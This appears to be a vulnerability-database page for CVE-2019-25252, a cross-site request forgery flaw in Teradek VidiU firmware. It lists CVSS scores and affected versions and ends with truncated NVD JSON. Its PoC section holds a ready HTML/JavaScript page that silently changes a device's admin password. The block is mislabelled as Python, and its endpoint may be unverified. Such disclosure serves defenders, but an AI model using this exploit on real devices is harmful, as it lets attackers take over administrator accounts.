Security Vulnerability Report
中文
CVE-2019-25252 CVSS 4.3 MEDIUM

CVE-2019-25252

Published: 2025-12-24 20:15:54
Last Modified: 2026-01-26 16:15:54
Source: [email protected]

Description

Teradek VidiU Pro 3.0.3 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft malicious web pages that automatically submit password change requests to the device when a logged-in administrator visits the page.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:teradek:vidiu_pro_firmware:2.4.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_pro_firmware:3.0.2:build31225:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_pro_firmware:3.0.3:build32136:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:vidiu_pro:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:teradek:vidiu_firmware:2.4.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_firmware:3.0.2:build31225:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_firmware:3.0.3:build32136:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:vidiu:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:teradek:vidiu_mini_firmware:2.4.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_mini_firmware:3.0.2:build31225:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_mini_firmware:3.0.3:build32136:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:vidiu_mini:-:*:*:*:*:*:*:* - NOT VULNERABLE
Teradek VidiU Pro <= 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2019-25252 CSRF Exploit for Teradek VidiU Pro --> <!-- Target: Teradek VidiU Pro device password change --> <!-- This PoC demonstrates the CSRF vulnerability --> <!DOCTYPE html> <html> <head> <title>Teradek VidiU Pro CSRF PoC</title> </head> <body> <h2>CVE-2019-25252 - Teradek VidiU Pro CSRF Password Reset</h2> <p>This page will automatically submit a password change request to the target device.</p> <script> // Configuration - Replace with target device IP/hostname var targetHost = "192.168.1.100"; // Target VidiU Pro IP var newPassword = "HackedPass123!"; // New admin password // Create the CSRF form automatically var form = document.createElement("form"); form.method = "POST"; form.action = "http://" + targetHost + "/admin/password-change"; // Add password change parameters var params = { "password": newPassword, "confirm_password": newPassword, "submit": "Apply" }; for (var key in params) { var input = document.createElement("input"); input.type = "hidden"; input.name = key; input.value = params[key]; form.appendChild(input); } document.body.appendChild(form); // Auto-submit the form form.submit(); </script> <noscript> <p>JavaScript is disabled. Please click the button below:</p> <button type="submit" formtarget="_blank">Submit Password Change</button> </noscript> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25252", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:53.700", "lastModified": "2026-01-26T16:15:54.310", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Teradek VidiU Pro 3.0.3 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft malicious web pages that automatically submit password change requests to the device when a logged-in administrator visits the page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_pro_firmware:2.4.10:*:*:*:*:*:*:*", "matchCriteriaId": "AB502907-F471-4CD6-96DB-482B8E0E1D74"}, {"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_pro_firmware:3.0.2:build31225:*:*:*:*:*:*", "matchCriteriaId": "3E2233DB-2467-4595-B0C5-AD15019F0EED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_pro_firmware:3.0.3:build32136:*:*:*:*:*:*", "matchCriteriaId": "ADC66DD8-EA14-47C0-8C31-C1B472FB7CC4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:teradek:vidiu_pro:-:*:*:*:*:*:*:*", "matchCriteriaId": "58CE55D2-C40E-4D63-ACA4-CCC076ACF6BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_firmware:2.4.10:*:*:*:*:*:*:*", "matchCriteriaId": "9CF9D82E-74EA-4BC6-8BA2-13421428591A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_firmware:3.0.2:build31225:*:*:*:*:*:*", "matchCriteriaId": "20A7FFB3-8409-47F4-B4CC-1E2E61DB06F9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_firmware:3.0.3:build32136:*:*:*:*:*:*", "matchCriteriaId": "287269D2-ECA3-49B5-AA3D-0BE655AC50CC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:teradek:vidiu:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC6A98F2-4C8D-4E91-9E8C-8503F8ABEEBD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:teradek:vidiu_mini_firmware:2.4.10:*:*:*:*:*:*:*", "matchCriteriaId": "6A6176D1-8E72-4146-8C8D-758EB9D17DBC"}, {"vulnerable": true, "criteria": "cp ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.